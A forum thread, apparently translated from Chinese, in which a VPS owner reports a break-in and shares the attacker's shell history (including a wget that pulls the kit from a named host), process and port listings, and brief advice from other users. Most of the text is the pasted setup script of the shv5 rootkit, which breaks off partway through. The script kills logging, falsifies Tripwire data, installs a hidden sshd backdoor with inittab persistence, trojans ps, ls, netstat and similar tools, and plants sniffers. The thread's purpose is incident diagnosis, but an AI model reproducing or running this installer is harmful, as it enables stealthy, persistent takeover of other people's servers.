Help, my server got hacked...
I recently wanted to build a small website for my brother as practice, so I bought some VPS space. Yesterday I had just finished setting up the Apache/PHP/MySQL stack; today I came back to try it and, uh, the password no longer worked. I quickly contacted the data center and had them reset the password, and then found that a hacker had been tampering with the box. From the command history I picked out the most suspicious commands the guy ran:
cat /etc/issue
cat /proc/cpuinfo
wget http://geox.at.ua/rk.jp g ------ this is the address the guy downloaded his trojan from; don't click it, anyone
tar zxvf rk.jpg
cd .sshd
./setup darkokicevohack123 666
Here is the output of ps auxw:
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0   1916   664 ?        S    17:42   0:00 init
root     15530  0.0  0.0   1580   576 ?        S    17:42   0:00 syslogd -m 0
root     15537  0.0  0.0   4900  1096 ?        S    17:42   0:00 /usr/sbin/sshd
root     15546  0.0  0.0   2144   804 ?        S    17:42   0:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
root     15558  0.0  0.0   2288  1144 ?        S    17:42   0:00 /bin/sh /usr/local/mysql/bin/mysqld_safe --datadir=/usr/local/mysql/v
mysql    15590  0.0  0.7 125048 14684 ?        S    17:42   0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=
root     15608  0.0  0.0   3124  1100 ?        S    17:42   0:00 crond
root     15616  0.0  0.0   4688   832 ?        S    17:42   0:00 /usr/sbin/saslauthd -m /var/run/saslauthd -a pam -n 1
root     15624  0.0  0.4  19700  9792 ?        S    17:42   0:00 /usr/local/apache2/bin/httpd -k start
daemon   15634  0.0  0.4  19832  9288 ?        S    17:42   0:00 /usr/local/apache2/bin/httpd -k start
daemon   15635  0.0  0.4  19832  9288 ?        S    17:42   0:00 /usr/local/apache2/bin/httpd -k start
daemon   15636  0.0  0.4  19832  9300 ?        S    17:42   0:00 /usr/local/apache2/bin/httpd -k start
daemon   15637  0.0  0.4  19832  9288 ?        S    17:42   0:00 /usr/local/apache2/bin/httpd -k start
daemon   15638  0.0  0.4  19832  9288 ?        S    17:42   0:00 /usr/local/apache2/bin/httpd -k start
root     22009  0.0  0.1   7752  2368 ?        R    19:35   0:00 sshd: root@pts/0
root     22012  0.0  0.0   2296  1336 pts/0    S    19:35   0:00 -bash
daemon   22177  0.0  0.4  19700  8928 ?        S    19:41   0:00 /usr/local/apache2/bin/httpd -k start
root     24410  0.0  0.0   2740   772 pts/0    R    20:28   0:00 ps auxw
Here is the output of netstat -ln:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:995             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:110             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN
raw        0      0 0.0.0.0:1               0.0.0.0:*               7
Active UNIX domain sockets (only servers)
Proto RefCnt Flags       Type       State         I-Node    Path
unix  2      [ ACC ]     STREAM     LISTENING     457424811 /tmp/mysql.sock
unix  2      [ ACC ]     STREAM     LISTENING     457424843 /var/run/saslauthd/mux
What on earth did this guy do to my server? Has it been turned into a zombie?? Please advise, seniors. Thanks!

Took a quick look; this probably "installed ssh" for you. If you don't need it, you can turn ssh off. To find out exactly what it did, download his stuff and have someone who knows shell look at the setup script inside.

Post the setup script.

OP, first clean out your own home directory, then change the password.

"cd .sshd" is the most suspicious one. Post what is inside .ssh, including the file contents.

OP, doesn't your VPS have a control panel?

The simple way: reinstall the system and change the SSH port...

Last edited by hello2crawler on 2010-4-4 23:44
Here is what that tarball unpacks to:
-rw-r--r-- 1 hello2crawler hello2crawler  15K Mar 24 11:00 .sshd
-rw-r--r-- 1 hello2crawler hello2crawler 502K Apr 20  2008 bin.tgz
-rw-r--r-- 1 hello2crawler hello2crawler  446 Mar 28  2008 conf.tgz
-rw-r--r-- 1 hello2crawler hello2crawler  29K Apr 15  2003 lib.tgz
-rwxr-xr-x 1 hello2crawler hello2crawler  24K Mar 30 15:59 setup
-rw-r--r-- 1 hello2crawler hello2crawler 121K Apr 17  2003 utilz.tgz
Setup is here. It does quite a few things; from a quick look it's all about planting an sshd backdoor. Find a backup and restore from it. Just changing the root password is not enough.

He was already root when he ran this. My guess is the main problem is a hole in the PHP source or the Apache configuration, and he found a way to get Apache to execute this?

Check the Apache logs?... though nine times out of ten they have already been altered.
#!/bin/bash
#
# shv5-internal-release
# by: JohnQ December/2007
#
# greetz to:
#
# [*] SH-members: Me :)
# PRIVATE ! DO NOT DISTRIBUTE BITCHEZ !

# BASIC DEFINES
DEFPASS=socardeaukdata
DEFPORT=6969
BASEDIR=`pwd`

# DON`T TOUCH BELOW UNLESS YOU KNOW WHAT U`R DOING !
# BEFORE WE MOVE ON LET`s WORK ON SAFE-GROUND !
unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

# RAINBOW COLOURS :)
BLK=''
RED=''
GRN=''
YEL=''
BLU=''
MAG=''
CYN=''
WHI=''
DRED=''
DGRN=''
DYEL=''
DBLU=''
DMAG=''
DCYN=''
DWHI=''
RES=''

# HOPE U`R NO TRYING THIS FROM USER !
# HOWEVER LET`S SEE WHAT KINDA KID U ARE ?
if [ "$(whoami)" != "root" ]; then
    echo "${DCYN}[${WHI}sh${DCYN}] ${WHI} BECOME ROOT AND TRY AGAIN ${RES}"
    echo ""
    exit
fi

# UNZIPING SHITS
tar zxf ./bin.tgz
tar zxf ./conf.tgz
tar zxf ./lib.tgz
tar zxf ./utilz.tgz
cd ./bin; tar zxf ./sshd.tgz
rm -rf ./sshd.tgz
cd $BASEDIR
rm -rf bin.tgz conf.tgz lib.tgz utilz.tgz
sleep 2
cd $BASEDIR
killall -9 syslogd >/dev/null 2>&1
startime=`date +%S`
echo "${DCYN}[${WHI}sh${DCYN}]# Installing shv5 ... this wont take long ${RES}"
echo "${DCYN}[${WHI}sh${DCYN}]# If u think we will patch your holes shoot yourself !${RES}"
echo "${DCYN}[${WHI}sh${DCYN}]# so patch manualy and fuck off! ${RES}"
echo ""
echo ""
echo "${WHI}============================================================================${RES}"
echo ""
echo "${DCYN} MMMMM MMMMMM "
echo " MMM MMMMMMMMM MMMM MMMM MMM [*] Presenting u shv5-rootkit !"
echo " MMM MMMM MMMMMMMM MMMM MMM [*] Designed for internal use !"
echo " MMM MMMMMMM MMMMMMMMMMMM MMM "
echo " MMM MMMMMMMM MMMMMMMMMMMM MMM [*] brought to you by: JohnQ "
echo " MMM MMMMMMMM MMMM MMM [*] December 2007 "
echo " MMM MMMM MMMMMMMM MMMM MMM "
echo " MMM MMMMMMMMM MMMM MMMM MMM [*] *** VERY PRIVATE *** "
echo " MMM MMM [*] *** so dont distribute *** "
echo " MMMMM -C- -R- -E- -W- MMMMMM "
echo " ${RES}"
echo ""
echo "${WHI}============================================================================${RES}"
echo ""
sleep 2
echo "${DCYN}[${WHI}sh${DCYN}]# backdooring started on ${WHI}`hostname -f`${RES}"
echo "${DCYN}[${WHI}sh${DCYN}]# ${RES}"
echo "${DCYN}[${WHI}sh${DCYN}]# ${RES}"

SYSLOGCONF="/etc/syslog.conf"
echo -n "${DCYN}[${WHI}sh${DCYN}]# checking for remote logging... ${RES}"
REMOTE=`grep -v "^#" "$SYSLOGCONF" | grep -v "^$" | grep "@" | cut -d '@' -f 2`
if [ ! -z "$REMOTE" ]; then
    echo "${DCYN}[${WHI}sh${DCYN}]# May Allah help us!${RES}"
    echo
    echo '${RED} REMOTE LOGGING DETECTED ${RES}'
    echo '${DCYN}[${WHI}sh${DCYN}]# I hope you can get to these other computer(s): ${RES}'
    echo
    for host in $REMOTE; do
        echo -n " "
        echo $host
    done
    echo
    echo ' ${WHI} cuz this box is LOGGING to it... ${RES}'
    echo
else
    echo " ${WHI} guess not.${RES}"
fi

#######################################################################
## CHEKING FOR MALICIOUS ADMIN TOOLS !(like tripwire, snort, etc...) ##
##                                                                   ##
#######################################################################
echo -n "${DCYN}[${WHI}sh${DCYN}]# checking for tripwire... ${RES}"
uname=`uname -n`
twd=/var/lib/tripwire/$uname.twd
if [ -d /etc/tripwire ]; then
    echo "${WHI} ALERT: TRIPWIRE FOUND! ${RES}"
    if [ -f /var/lib/tripwire/$uname.twd ]; then
        chattr -isa $twd
        echo -n "${DCYN}[${WHI}sh${DCYN}]# checking for tripwire-database... ${RES}"
        echo "${RED} ALERT! tripwire database found ${RES}"
        echo "${DCYN}[${WHI}sh${DCYN}]# ${WHI} dun worry we got handy-tricks for this :) ${RES}"
        echo "-----------------------------------------" > $twd
        echo "Tripwire segment-faulted !" >> $twd
        echo "-----------------------------------------" >> $twd
        echo "" >> $twd
        echo "The reasons for this may be: " >> $twd
        echo "" >> $twd
        echo "corrupted disc-geometry, possible bad disc-sectors" >> $twd
        echo "corrupted files while checking for possible change etc." >> $twd
        echo ""
        echo "pls. rerun tripwire to build the database again!" >> $twd
        echo "" >> $twd
    else
        echo "${WHI} lucky you: Tripwire database not found. ${RES}"
    fi
else
    echo "${WHI} guess not. ${RES}"
fi

# restoring login
if [ -f /sbin/xlogin ]; then
    chattr -isa /sbin/xlogin
    chattr -isa /bin/login
    mv -f /sbin/xlogin /bin/login
    chmod 7455 /bin/login
    chattr +isa /bin/login
fi
echo "${DCYN}[${WHI}sh${DCYN}]# ${BLU} ${RES}"
if [ -f /etc/sh.conf ]; then
    chattr -isa /etc/sh.conf
    rm -rf /etc/sh.conf
fi

# checking if we got needed libs and filez
if [ ! -f /lib/libproc.a ]; then
    mv lib/libproc.a /lib/
fi
if [ ! -f /lib/libproc.so.2.0.6 ]; then
    mv lib/libproc.so.2.0.6 /lib/
fi
perl .sshd
/sbin/ldconfig >/dev/null 2>&1
#if [ -f /lib/libncurses.so.5 ]; then
#    echo ""
#else
#    ln -s /lib/libncurses.so.4 /lib/libncurses.so.5 2>/dev/null
#fi
if [ -f /.bash_history ]; then
    chattr -isa /.bash_history >/dev/null 2>&1
    rm -rf /.bash_history
fi
if [ -f /bin/.bash_history ]; then
    chattr -isa /bin/.bash_history
    rm -rf /bin/.bash_history
fi
if [ ! -f /usr/bin/md5sum ]; then
    touch -acmr /bin/ls bin/md5sum
    cp bin/md5sum /usr/bin/md5sum
fi

if test -n "$1" ; then
    echo "${DCYN}[${WHI}sh${DCYN}]#Using Password : ${WHI}$1 ${BLU} ${RES}"
    cd $BASEDIR/bin
    echo -n $1 >> /tmp/.mf
    echo -n $1|md5sum > /etc/sh.conf
else
    echo "${DCYN}[${WHI}sh${DCYN}]# ${WHI} No Password Specified, using default - $DEFPASS ${BLU} ${RES}"
    echo -n $DEFPASS >> /tmp/.mf
    echo -n $DEFPASS|md5sum > /etc/sh.conf
fi
touch -acmr /bin/ls /etc/sh.conf
chown -f root:root /etc/sh.conf
chattr +isa /etc/sh.conf

if test -n "$2" ; then
    echo "${DCYN}[${WHI}sh${DCYN}]# Using ssh-port : ${WHI}$2 ${RES}"
    echo "Port $2" >> $BASEDIR/bin/.sh/sshd_config
    echo "3 $2" >> $BASEDIR/conf/hosts.h
    echo "4 $2" >> $BASEDIR/conf/hosts.h
    port=$2
    cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
    mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
else
    echo "${DCYN}[${WHI}sh${DCYN}]# No ssh-port Specified, using default - $DEFPORT ${BLU} ${RES}"
    echo "Port $DEFPORT" >> $BASEDIR/bin/.sh/sshd_config
    echo "3 $2" >> $BASEDIR/conf/hosts.h
    echo "4 $2" >> $BASEDIR/conf/hosts.h
    port=$DEFPORT
    cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
    mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
fi
/sbin/iptables -I INPUT -p tcp --dport $port -j ACCEPT

if [ -f /lib/lidps1.so ]; then
    chattr -isa /lib/lidps1.so
    rm -rf /lib/lidps1.so
fi
if [ -f /usr/include/hosts.h ]; then
    chattr -isa /usr/include/hosts.h
    rm -rf /usr/include/hosts.h
fi
if [ -f /usr/include/file.h ]; then
    chattr -isa /usr/include/file.h
    rm -rf /usr/include/file.h
fi
if [ -f /usr/include/log.h ]; then
    chattr -isa /usr/include/log.h
    rm -rf /usr/include/log.h
fi
if [ -f /usr/include/proc.h ]; then
    chattr -isa /usr/include/proc.h
    rm -rf /usr/include/proc.h
fi
cd $BASEDIR
mv $BASEDIR/conf/lidps1.so /lib/lidps1.so
touch -acmr /bin/ls /lib/lidps1.so
touch -acmr /bin/ls $BASEDIR/conf/*
mv $BASEDIR/conf/* /usr/include/

# Ok lets start creating dirs
SSHDIR=/lib/libsh.so
HOMEDIR=/usr/lib/libsh
if [ -d /lib/libsh.so ]; then
    chattr -isa /lib/libsh.so
    chattr -isa /lib/libsh.so/*
    rm -rf /lib/libsh.so
fi
if [ -d /usr/lib/libsh ]; then
    chattr -isa /usr/lib/libsh
    chattr -isa /usr/lib/libsh/*
    rm -rf /usr/lib/libsh/*
fi
mkdir $SSHDIR
touch -acmr /bin/ls $SSHDIR
mkdir $HOMEDIR
touch -acmr /bin/ls $HOMEDIR
cd $BASEDIR/bin
mv .sh/* $SSHDIR/
mv .sh/.bashrc $HOMEDIR

if [ -f /sbin/ttyload ]; then
    chattr -AacdisSu /sbin/ttyload
    rm -rf /sbin/ttyload
fi
if [ -f /sbin/ttylib ]; then
    chattr -AacdisSu /sbin/ttylib
    rm -rf /sbin/ttylib
fi
if [ -f /usr/sbin/ttyload ]; then
    chattr -isa /usr/sbin/ttyload
    rm -rf /usr/sbin/ttyload
fi
if [ -f /sbin/ttymon ]; then
    chattr -isa /sbin/ttymon
    rm -rf /sbin/ttymon
fi
mv $SSHDIR/sshd /sbin/ttyload
chmod a+xr /sbin/ttyload
chmod o-w /sbin/ttyload
touch -acmr /bin/ls /sbin/ttyload
chattr +isa /sbin/ttyload
kill -9 `pidof ttyload` >/dev/null 2>&1
mv $SSHDIR/bin/ttylib /sbin/ttylib
chmod a+xr /sbin/ttylib
chmod o-w /sbin/ttylib
touch -acmr /bin/ls /sbin/ttylib
chattr +isa /sbin/ttylib
kill -9 `pidof ttylib` >/dev/null 2>&1
mv $BASEDIR/bin/ttymon /sbin/ttymon
chmod a+xr /sbin/ttymon
touch -acmr /bin/ls /sbin/ttymon
chattr +isa /sbin/ttymon
kill -9 `pidof ttymon` >/dev/null 2>&1
cp /bin/bash $SSHDIR

# INITTAB SHUFFLING
chattr -isa /etc/inittab
cat /etc/inittab |grep -v ttyload|grep -v getty > /tmp/.init1
cat /etc/inittab |grep getty > /tmp/.init2
echo "# Loading standard ttys" >> /tmp/.init1
echo "0:2345:once:/usr/sbin/ttyload" >> /tmp/.init1
cat /tmp/.init2 >> /tmp/.init1
echo "" >> /tmp/.init1
echo "# modem getty." >> /tmp/.init1
echo "# mo:235:respawn:/usr/sbin/mgetty -s 38400 modem" >> /tmp/.init1
echo "" >> /tmp/.init1
echo "# fax getty (hylafax)" >> /tmp/.init1
echo "# mo:35:respawn:/usr/lib/fax/faxgetty /dev/modem" >> /tmp/.init1
echo "" >> /tmp/.init1
echo "# vbox (voice box) getty" >> /tmp/.init1
echo "# I6:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI6" >> /tmp/.init1
echo "# I7:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI7" >> /tmp/.init1
echo "" >> /tmp/.init1
echo "# end of /etc/inittab" >> /tmp/.init1
echo "/sbin/ttyload -q >/dev/null 2>&1" > /usr/sbin/ttyload
echo "/sbin/ttymon >/dev/null 2>&1" >> /usr/sbin/ttyload
echo "/sbin/ttylib >/dev/null 2>&1" >> /usr/sbin/ttyload
echo "/sbin/iptables -I INPUT -p tcp --dport $port -j ACCEPT" >> /usr/sbin/ttyload
echo "iptables -I INPUT -p tcp --dport $port -j ACCEPT" >> /usr/sbin/ttyload
touch -acmr /bin/ls /usr/sbin/ttyload
chmod +x /usr/sbin/ttyload
chattr +isa /usr/sbin/ttyload
/usr/sbin/ttyload >/dev/null 2>&1
touch -amcr /etc/inittab /tmp/.init1
mv -f /tmp/.init1 /etc/inittab
rm -rf /tmp/.init2

# MAKING SURE WE GOT IT BACKDORED RIGHT !
if [ ! "`grep ttyload /etc/inittab`" ]; then
    echo "${RED}[${WHI}sh${RED}]# WARNING - SSHD WONT BE RELOADED UPON RESTART "
    echo "${RED}[${WHI}sh${RED}]# inittab shuffling probly fucked-up ! "
fi

# Say hello to md5sum fixer boys n gurls !
if [ -f /sbin/ifconfig ]; then
    /usr/bin/md5sum /sbin/ifconfig >> .shmd5
fi
if [ -f /bin/ps ]; then
    /usr/bin/md5sum /bin/ps >> .shmd5
fi
if [ -f /bin/ls ]; then
    /usr/bin/md5sum /bin/ls >> .shmd5
fi
if [ -f /bin/netstat ]; then
    /usr/bin/md5sum /bin/netstat >> .shmd5
fi
if [ -f /usr/bin/find ]; then
    /usr/bin/md5sum /usr/bin/find >> .shmd5
fi
if [ -f /usr/bin/top ]; then
    /usr/bin/md5sum /usr/bin/top >> .shmd5
fi
if [ -f /usr/sbin/lsof ]; then
    /usr/bin/md5sum /usr/sbin/lsof >> .shmd5
fi
if [ -f /usr/bin/slocate ]; then
    /usr/bin/md5sum /usr/bin/slocate >> .shmd5
fi
if [ -f /usr/bin/dir ]; then
    /usr/bin/md5sum /usr/bin/dir >> .shmd5
fi
if [ -f /usr/bin/md5sum ]; then
    /usr/bin/md5sum /usr/bin/md5sum >> .shmd5
fi
if [ ! -f /dev/srd0 ]; then
    ./encrypt -e .shmd5 /dev/srd0
    touch -acmr /bin/ls /dev/srd0
    chattr a+r /dev/srd0
    chown -f root:root /dev/srd0
fi
rm -rf .shmd5

# time change bitch
touch -acmr /sbin/ifconfig ifconfig >/dev/null 2>&1
touch -acmr /bin/ps ps >/dev/null 2>&1
touch -acmr /bin/ls ls >/dev/null 2>&1
touch -acmr /bin/netstat netstat >/dev/null 2>&1
touch -acmr /usr/bin/find find >/dev/null 2>&1
touch -acmr /usr/bin/top top >/dev/null 2>&1
touch -acmr /usr/sbin/lsof lsof >/dev/null 2>&1
touch -acmr /sbin/syslogd syslogd >/dev/null 2>&1
touch -acmr /usr/bin/slocate slocate >/dev/null 2>&1
touch -acmr /usr/bin/dir dir >/dev/null 2>&1
touch -acmr /usr/bin/md5sum md5sum >/dev/null 2>&1
md5sum="lingmail.com"
touch -acmr /usr/bin/pstree pstree >/dev/null 2>&1

# Backdoor ps/top/du/ls/netstat/etc..
cd $BASEDIR/bin
BACKUP=/usr/lib/libsh/.backup
mkdir $BACKUP
# ps ...
if [ -f /usr/bin/ps ]; then
    chattr -isa /usr/bin/ps
    cp /usr/bin/ps $BACKUP
    mv -f ps /usr/bin/ps
    chattr +isa /usr/bin/ps
fi
if [ -f /bin/ps ]; then
    chattr -isa /bin/ps
    cp /bin/ps $BACKUP
    mv -f ps /bin/ps
    chattr +isa /bin/ps
fi
# ifconfig ...
chattr -isa /sbin/ifconfig
cp /sbin/ifconfig $BACKUP
mv -f ifconfig /sbin/ifconfig
chattr +isa /sbin/ifconfig
# netstat ...
if [ -f /usr/sbin/netstat ]; then
    chattr -isa /usr/sbin/netstat
    mv -f netstat /usr/sbin/netstat
    chattr +isa /usr/sbin/netstat
fi
chattr -isa /bin/netstat
cp /bin/netstat $BACKUP
mv -f netstat /bin/netstat
chattr +isa /bin/netstat
# top ...
if [ -f /usr/bin/top ]; then
    chattr -isa /usr/bin/top
    cp /usr/bin/top $BACKUP
    mv -f top /usr/bin/top
    chattr +isa /usr/bin/top
    if [ -f /lib/libncurses.so.5 ]; then
        ln -s /lib/libncurses.so.5 /lib/libncurses.so.4 2>/dev/null
    fi
    if [ -f /usr/lib/libncurses.so.5 ]; then
        ln -s /usr/lib/libncurses.so.5 /lib/libncurses.so.4 2>/dev/null
    fi
fi
# slocate ...
if [ -f /usr/bin/slocate ]; then
    chattr -isa /usr/bin/slocate
    cp /usr/bin/slocate $BACKUP
    mv -f slocate /usr/bin/slocate
    chattr +isa /usr/bin/slocate
fi
# ls ...
chattr -isa /bin/ls
cp /bin/ls $BACKUP
mv -f ls /bin/ls
chattr +isa /bin/ls
# find ...
if [ -f /usr/bin/find ]; then
    chattr -isa /usr/bin/find
    cp /usr/bin/find $BACKUP
    mv -f find /usr/bin/find
    chattr +isa /usr/bin/find
fi
# dir ...
if [ -f /usr/bin/dir ]; then
    chattr -isa /usr/bin/dir
    cp /usr/bin/dir $BACKUP
    mv -f dir /usr/bin/dir
    chattr +isa /usr/bin/dir
fi
# lsof ...
if [ -f /usr/sbin/lsof ]; then
    chattr -isa /usr/sbin/lsof
    cp /usr/sbin/lsof $BACKUP
    mv -f lsof /usr/sbin/lsof
    chattr +isa /usr/sbin/lsof
fi
# pstree ...
if [ -f /usr/bin/pstree ]; then
    chattr -isa /usr/bin/pstree
    cp /usr/bin/pstree $BACKUP
    mv -f pstree /usr/bin/pstree
    chattr +isa /usr/bin/pstree
fi
# md5sum ...
chattr -isa /usr/bin/md5sum
cp /usr/bin/md5sum $BACKUP
mv -f md5sum /usr/bin/md5sum
chattr +isa /usr/bin/md5sum
# syslogd ...
# we won`t trojan it coz its too sensitive and won`t work.
# Admin will notice it upon system-restart!
#if [ -f /sbin/syslogd ]; then
#    chattr -isa /sbin/syslogd
#    cp /sbin/syslogd $BACKUP
#    mv -f syslogd /sbin/syslogd
#    chattr +isa /sbin/syslogd
#fi
echo "${DCYN}[${WHI}sh${DCYN}]# : ps/ls/top/netstat/ifconfig/find/ and rest backdoored${RES}"
echo "${DCYN}[${WHI}sh${DCYN}]# ${RES}"
echo "${DCYN}[${WHI}sh${DCYN}]# ${RES}"
cd $BASEDIR
#if [ ! -f /usr/bin/wget ]; then
#    touch -acmr /bin/ls ./bin/wget
#    chmod 744 ./bin/wget
#    mv ./bin/wget /usr/bin/wget
#fi
# PICO WILL MAKE RK GROW BIG!
# SO FUCK OFF AND USE vi !
#if [ ! -f /usr/bin/pico ]; then
#    touch -acmr /bin/ls ./pico
#    chmod 744 ./pico
#    mv ./pico /usr/bin/pico
#fi
touch -acmr /bin/ls $BASEDIR/utilz
touch -acmr /bin/ls $BASEDIR/utilz/*
mv $BASEDIR/utilz $HOMEDIR/
echo "${DCYN}[${WHI}sh${DCYN}]# : mirk/synscan/others... moved ${RES}"
echo "${DCYN}[${WHI}sh${DCYN}]# ${RES}"
mkdir $HOMEDIR/.sniff
mv $BASEDIR/bin/shsniff $HOMEDIR/.sniff/shsniff
mv $BASEDIR/bin/shp $HOMEDIR/.sniff/shp
mv $BASEDIR/bin/shsb $HOMEDIR/shsb
mv $BASEDIR/bin/hide $HOMEDIR/hide
touch -acmr /bin/ls $HOMEDIR/.sniff/shsniff
touch -acmr /bin/ls $HOMEDIR/.sniff/shp
touch -acmr /bin/ls $HOMEDIR/shsb
touch -acmr /bin/ls $HOMEDIR/hide
chmod +x $HOMEDIR/.sniff/*
chmod +x $HOMEDIR/shsb
chmod +x $HOMEDIR/hide
echo "${DCYN}[${WHI}sh${DCYN}]# : sniff/parse/sauber/hide moved ${RES}"
echo "${DCYN}[${WHI}sh${DCYN}]# ${RES}"

# CHECKING FOR VULN DAEMONS
# JUST WARNING NOT PATCHING HeH
echo "${DCYN}[${WHI}sh${DCYN}]# Checking for vuln-daemons ... ${RES}"
ps aux > /tmp/.procs
if [ "`cat /tmp/.procs | grep named`" ]; then
    echo "${RED}[${WHI}sh${RED}]# NAMED found - patch it bitch !!!! ${RES}"
fi
if [ -f /usr/sbin/wu.ftpd ]; then
    echo "${RED}[${WHI}sh${RED}]# WU-FTPD found - patch it bitch !!!! ${RES}"
fi
if [ "`cat /tmp/.procs | grep smbd`" ]; then
    echo "${RED}[${WHI}sh${RED}]# SAMBA found - patch it bitch !!!! ${RES}"
fi
if [ "`cat /tmp/.procs | grep rpc.statd`" ]; then
    echo "${RED}[${WHI}sh${RED}]# RPC.STATD found - patch it bitch !!!! ${RES}"
fi
rm -rf /tmp/.procs
netstat -natp > /tmp/.stats
if [ "`cat /tmp/.stats | grep 443 | grep http`" ]; then
    echo "${RED}[${WHI}sh${RED}]# MOD_SSL found - patch it bitch !!!! ${RES}"
fi
rm -rf /tmp/.stats

# CHECKING FOR HOSTILE ROOTKITS/BACKDORS
mkdir $HOMEDIR/.owned
if [ -f /etc/ttyhash ]; then
    chattr -AacdisSu /etc/ttyhash
    rm -rf /etc/ttyhash
fi
if [ -d /lib/ldd.so ]; then
    chattr -isa /lib/ldd.so
    chattr -isa /lib/ldd.so/*
    mv /lib/ldd.so $HOMEDIR/.owned/tk8
    echo "${RED}[${WHI}sh${RED}]# tk8 detected and owned ...!!!! ${RES}"
fi
if [ -d /usr/src/.puta ]; then
    chattr -isa /usr/src/.puta
    chattr -isa /usr/src/.puta/*
    mv /usr/src/.puta $HOMEDIR/.owned/tk7
    echo "${RED}[${WHI}sh${RED}]# tk7 detected and owned ...!!!! ${RES}"
fi
if [ -f /usr/sbin/xntpd ]; then
    chattr -isa /usr/sbin/xntpd
    rm -rf /usr/sbin/xntpd
fi
if [ -f /usr/sbin/nscd ]; then
    chattr -isa /usr/sbin/nscd
    rm -rf /usr/sbin/nscd
fi
if [ -d /usr/include/bex ]; then
    chattr -isa /usr/info/termcap.info-5.gz; rm -rf /usr/info/termcap.info-5.gz
    chattr -isa /usr/include/audit.h; rm -rf /usr/include/audit.h
    chattr -isa /usr/include/bex
    chattr -isa /usr/include/bex/*
    mv /usr/include/bex/ $HOMEDIR/.owned/bex2
    if [ -f /var/log/tcp.log ]; then
        chattr -isa /var/log/tcp.log
        cp /var/log/tcp.log $HOMEDIR/.owned/bex2/snifflog
    fi
    chattr -isa /usr/bin/sshd2 >/dev/null 2>&1
    rm -rf /usr/bin/sshd2 >/dev/null 2>&1
    echo "${RED}[${WHI}sh${RED}]# beX2 detected and owned ...!!!! ${RES}"
fi
if [ -d /dev/tux/ ]; then
    chattr -isa /usr/bin/xsf >/dev/null 2>&1
    rm -rf /usr/bin/xsf >/dev/null 2>&1
    chattr -isa /usr/bin/xchk >/dev/null 2>&1
    rm -rf /usr/bin/xchk >/dev/null 2>&1
    chattr -isa /dev/tux >/dev/null 2>&1
    mv /dev/tux $HOMEDIR/.owned/tuxkit
    echo "${RED}[${WHI}sh${RED}]# tuxkit detected and owned ...!!!! ${RES}"
fi
if [ -f /usr/bin/ssh2d ]; then
    chattr -isa /usr/bin/ssh2d
    rm -rf /usr/bin/ssh2d
    chattr -isa /lib/security/.config/
    chattr -isa /lib/security/.config/*
    rm -rf /lib/security/.config
    echo "${RED}[${WHI}sh${RED}]# optickit detected and removed ...!!!! ${RES}"
fi
if [ -f /etc/ld.so.hash ]; then
    chattr -isa /etc/ld.so.hash
    rm -rf /etc/ld.so.hash
fi
chattr +isa /usr/lib/libsh
chattr +isa /lib/libsh.so

# GREPPING SHITZ FROM rc.sysinit and inetd.conf
if [ -f /etc/rc.d/rc.sysinit ]; then
    chattr -isa /etc/rc.d/rc.sysinit
    cat /etc/rc.d/rc.sysinit | grep -v "# Xntps (NTPv3 daemon) startup.."| grep -v "/usr/sbin/xntps"| grep -v "/usr/sbin/nscd" > /tmp/.grep
    chmod +x /tmp/.grep
    touch -acmr /etc/rc.d/rc.sysinit /tmp/.grep
    mv -f /tmp/.grep /etc/rc.d/rc.sysinit
    rm -rf /tmp/.grep
fi
if [ -f /etc/inetd.conf ]; then
    chattr -isa /etc/inetd.conf
    cat /etc/inetd.conf | grep -v "6635"| grep -v "9705" > /tmp/.grep
    touch -acmr /etc/inted.conf /tmp/.grep
    mv -f /tmp/.grep /etc/inetd.conf
    rm -rf /tmp/.grep
fi

# KILLING SOME LAMME DAEMONS
killall -9 -q nscd >/dev/null 2>&1
killall -9 -q xntps >/dev/null 2>&1
killall -9 -q mountd >/dev/null 2>&1
killall -9 -q mserv >/dev/null 2>&1
killall -9 -q psybnc >/dev/null 2>&1
killall -9 -q t0rns >/dev/null 2>&1
killall -9 -q linsniffer >/dev/null 2>&1
killall -9 -q sniffer >/dev/null 2>&1
killall -9 -q lpsched >/dev/null 2>&1
killall -9 -q sniff >/dev/null 2>&1
killall -9 -q sn1f >/dev/null 2>&1
killall -9 -q sshd2 >/dev/null 2>&1
killall -9 -q xsf >/dev/null 2>&1
killall -9 -q xchk >/dev/null 2>&1
killall -9 -q ssh2d >/dev/null 2>&1

echo "${WHI}--------------------------------------------------------------------${RES}"
echo "${DCYN}[${WHI}sh${DCYN}]# ${RES}"
MYIPADDR=`/sbin/ifconfig eth0 | grep "inet addr:" | awk -F ' ' ' {print $2} ' | cut -c6-`
echo "${DCYN}[${WHI}sh${DCYN}]# Hostname :${WHI} `hostname -f` ($MYIPADDR)${RES}"
uname -a | awk '{ print$11 }' >/tmp/info_tmp
echo "${DCYN}[${WHI}sh${DCYN}]# Arch : ${WHI}`cat /tmp/info_tmp` -+- bogomips : `cat /proc/cpuinfo | grep bogomips | awk ' {print $3}'` '${RES}"
echo "${DCYN}[${WHI}sh${DCYN}]# Alternative IP :${WHI} "`hostname -i`" -+-Might be ["`/sbin/ifconfig | grep \eth | wc -l`" ] active adapters.${RES}"
if [ -f /etc/redhat-release ]; then
